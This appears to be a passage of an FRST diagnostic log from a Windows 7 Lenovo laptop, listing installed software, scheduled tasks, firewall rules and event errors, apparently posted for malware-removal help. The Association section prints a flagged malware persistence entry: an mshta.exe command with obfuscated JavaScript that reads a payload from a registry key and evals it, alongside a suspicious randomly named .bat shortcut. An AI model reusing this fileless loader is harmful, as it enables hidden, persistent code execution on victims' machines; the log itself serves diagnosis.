Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)

Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - Canon Inc.)

Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.2 - Canon Inc.)

Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)

Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)

Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)

Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)

Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.5 - Conexant)

Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.59 - Google Inc.)

Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)

Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden

Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)

Intel® Identity Protection Technology 1.2.32.0 (HKLM-x32\...\{2D793E41-F598-1014-9984-F3B169A93F79}) (Version: 1.2.32.0 - Intel Corporation)

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.1.80.1211 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)

Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)

Intel® Update Manager (x32 Version: 1.6.3.70 - Intel Corporation) Hidden

Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)

Intel® PROSet/Wireless Software (HKLM-x32\...\{a9888f41-68ae-43df-bd7d-d93405a44106}) (Version: 17.13.11 - Intel Corporation)

Java 7 Update 76 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217076FF}) (Version: 7.0.760 - Oracle)

Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.00 - )

Lenovo Patch Utility (HKLM-x32\...\{AD32F5E9-6BDD-480A-8B7B-95571D04691C}) (Version: 1.3.1.1 - Lenovo Group Limited)

Lenovo Patch Utility 64 bit (HKLM\...\{0369F866-2CE0-4EB9-B426-88FA122C6E82}) (Version: 1.3.0.9 - Lenovo Group Limited)

Lenovo Power Management Driver (Version: 1.67.12.16 - Lenovo) Hidden

Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)

Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.16 - Lenovo)

Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)

Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )

Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0037 - Lenovo)

Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)

Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)

Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)

Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)

Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)

McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)

McAfee VirusScan Enterprise (HKLM-x32\...\{CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF}) (Version: 8.8.06000 - McAfee, Inc.)

Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden

Message Center Plus (HKLM\...\{C2C2DB64-1BCE-4FA7-962D-457795ECCEC0}) (Version: 3.3.0004.00 - Lenovo Group Limited)

Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden

Metric Collection SDK 35 (x32 Version: 1.2.0006.00 - Lenovo Group Limited) Hidden

Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)

Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)

Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)

Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)

Mp3tag v2.71 (HKLM-x32\...\Mp3tag) (Version: v2.71 - Florian Heidenreich)

On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.01 - )

Potplayer-64 bit (HKLM\...\PotPlayer64) (Version:  - Kakao Corp.)

Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)

RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.10 - Lenovo)

Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )

RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)

Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)

ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.42 - )

ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )

ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)

ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.26.81 - Lenovo)

ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.74 - Lenovo)

ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)

VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)

Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)

Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)

Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)

Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)

Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)

Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)

Windows Driver Package - Lenovo 1.62.00.00 (01/19/2011 1.62.00.00) (HKLM\...\D01A7EE241898C810674C69EB908D655D149BE77) (Version: 01/19/2011 1.62.00.00 - Lenovo)

Windows Driver Package - Synaptics (SynTP) Mouse  (05/05/2011 15.3.6.0) (HKLM\...\C63C03BF3BE2B6F6204BB54541690449FFF79F4F) (Version: 05/05/2011 15.3.6.0 - Synaptics)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)

Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {03F4E4A8-6650-450E-B602-7D6032954BD8} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)

Task: {127E1244-6272-4841-9A8E-A3B0A1E08CD4} - System32\Tasks\Lenovo\Message Center Plus Launcher => C:\Program Files (x86)\Lenovo\message center plus\mcplaunch.exe [2014-09-13] (Lenovo)

Task: {3C77B26C-534F-4613-A1E0-9147FA029E6E} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"

Task: {41254CBE-BE8E-4EBE-AE49-C2E30CA9947E} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

Task: {440D6F89-2BAA-4EC9-9C9D-8A3AE544B210} - System32\Tasks\Lenovo\LSC\LSCTaskService => C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCTaskService.exe

Task: {55FB8BD6-8C4C-4920-91B5-692D04045384} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {5EE08B5E-D6A7-4F92-904C-2E271853A892} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)

Task: {637CEB23-19E3-4FCF-B1D2-61109D529939} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

Task: {6DC323AF-E881-40DB-86B6-2688501CE555} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)

Task: {90C5AA67-EF23-490C-AFCE-431D19BC7B18} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)

Task: {90F0D108-CFF4-4F30-8C9C-5B59ACAA6575} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2014-09-13] (Lenovo)

Task: {938017A0-02C6-4DF7-AEB0-6D3BE6B25996} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe

Task: {9D9EE676-C781-48C4-AF2D-307B6C83E669} - System32\Tasks\Lenovo\SROptimizer => C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\\SRORest.exe [2012-03-05] (Lenovo Group Limited)

Task: {9DD3046C-36ED-4E44-9BBE-C23AC588FAB8} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {A94CD08B-C77E-4067-99A1-5D6B5DFD53FB} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)

Task: {B42F4A52-F3B1-4202-9829-30D4DEB32DF2} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()

Task: {B5C085DD-62CF-4F9B-863E-691BC8B15B81} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {C34C57A6-1780-4938-AD2E-D5E2595F7A9E} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()

Task: {C7978D9E-39F9-4D04-A5F3-99917A5E71E9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

Task: {D497E88F-86B7-47D5-8BFD-58BB151D6E9A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)

Task: {DA927600-D95C-4BE2-86D4-0D34262FBA8E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-15] (Adobe Systems Incorporated)

Task: {EFF1F180-818C-44EE-99C3-35CE783B2461} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()

Task: {F19D65BF-FFD7-488E-81FC-CBFD694B199D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()

Task: {F3DF85DF-DCFB-42F3-9E95-75B631729CA9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe

Task: {FB56393F-3829-44D5-97C4-9FA16D7AF324} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml

Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

Shortcut: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk -> C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat ()

 

==================== Loaded Modules (Whitelisted) ==============

 

2011-10-23 13:48 - 2016-04-14 06:08 - 00107008 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL

2011-10-23 13:43 - 2010-10-26 10:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

2011-10-23 13:46 - 2016-03-02 00:52 - 00102904 _____ () C:\Windows\System32\IccLibDll_x64.dll

2016-10-15 16:06 - 2016-09-10 12:13 - 00028544 _____ () C:\Program Files (x86)\Lenovo\System Update\SUService.exe

2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll

2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll

2016-10-15 15:03 - 2016-10-15 15:03 - 19635392 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-13 16:34 - 2009-06-10 11:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 192.168.1.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [{557FD2C9-2A62-466B-8816-BE633032D5CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{03DFB3DC-2095-4510-A567-0FD1AC84D38E}] => (Allow) LPort=2869

FirewallRules: [{939994F3-B029-408E-A45B-656D662258E5}] => (Allow) LPort=1900

FirewallRules: [{FB2FBBC5-CFB5-4C0D-9B9D-AB475DA6AB32}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{35BA6FB7-E803-42FD-B4E5-C83BAC48B6FC}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe

FirewallRules: [{272A8282-9BDC-4E20-B536-3C4E8B96312B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{05BDB8A8-4D5A-4E2D-A4F1-415929A64E19}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{AC727E4B-2EA7-4F3F-BFF0-F79E00246AF9}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{D4AD504C-892E-4438-BDE4-9DB67DD5B7BA}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{CC021E9A-1E83-4E51-997E-170E3B0D0E7B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{11E3ABC0-8855-454E-AA19-D7473CD862E3}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [TCP Query User{F0458B1B-4AF2-4B5E-AC7E-5EC679054837}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [UDP Query User{7E53DAB9-4A4C-431A-AAAB-8AA0F88D2DE1}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{30334865-C066-41CD-9C1F-8254C57A1B1B}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{EEA64370-148F-4DA2-8044-A785490116B2}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{E1757C0D-F532-4F82-AE9E-3D9E867F2A08}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{CD716B18-5F73-4411-8B74-236BD61D44C8}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{803C93D3-96A6-446E-8D23-23BCADB6445A}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{4CB06D72-5D6E-49DF-A836-79D73949BD90}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{EC124B96-498B-4861-908B-3C4D7DAC6F87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{87242A7F-F3FA-4D44-B1C7-A56539FCF863}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C07E1440-D3D1-4BB5-BA8C-5D939796F63C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe

FirewallRules: [{DAEDB0D2-9B07-4435-B2B8-F9470E3F1F5A}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe

FirewallRules: [{E363884B-A318-4E92-B78D-F56F23ECC504}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe

FirewallRules: [{CCADAA90-51EF-41DF-AA38-0EE14A47FA39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

FirewallRules: [{3C9229B1-0649-4BBC-BDE6-E400F423E93A}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

FirewallRules: [{B3A06D6F-A82C-457C-A2D5-CBF7B818DF20}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

 

==================== Restore Points =========================

 

25-09-2016 10:34:02 Windows Update

26-09-2016 03:00:33 Windows Update

29-09-2016 20:56:38 Windows Update

03-10-2016 20:50:41 Windows Update

09-10-2016 22:13:22 Windows Update

09-10-2016 22:51:07 Windows Update

15-10-2016 15:29:16 Windows Update

15-10-2016 23:27:47 Restore Point Created by FRST

16-10-2016 00:44:12 Windows Update

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (10/16/2016 09:40:29 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/16/2016 08:54:37 AM) (Source: PC-Doctor) (EventID: 1) (User: )

Description: (1932) Asapi: (08:54:37:4440)(1932) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

 

Error: (10/16/2016 08:31:55 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08

Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1

Exception code: 0xc0000005

Fault offset: 0x0000000000048d84

Faulting process id: 0x784

Faulting application start time: 0x01d227db822ebf02

Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe

Faulting module path: C:\Windows\SYSTEM32\ntdll.dll

Report Id: cfe0acda-93ce-11e6-a940-f0def19d1112

 

Error: (10/16/2016 08:31:52 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/16/2016 12:41:16 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

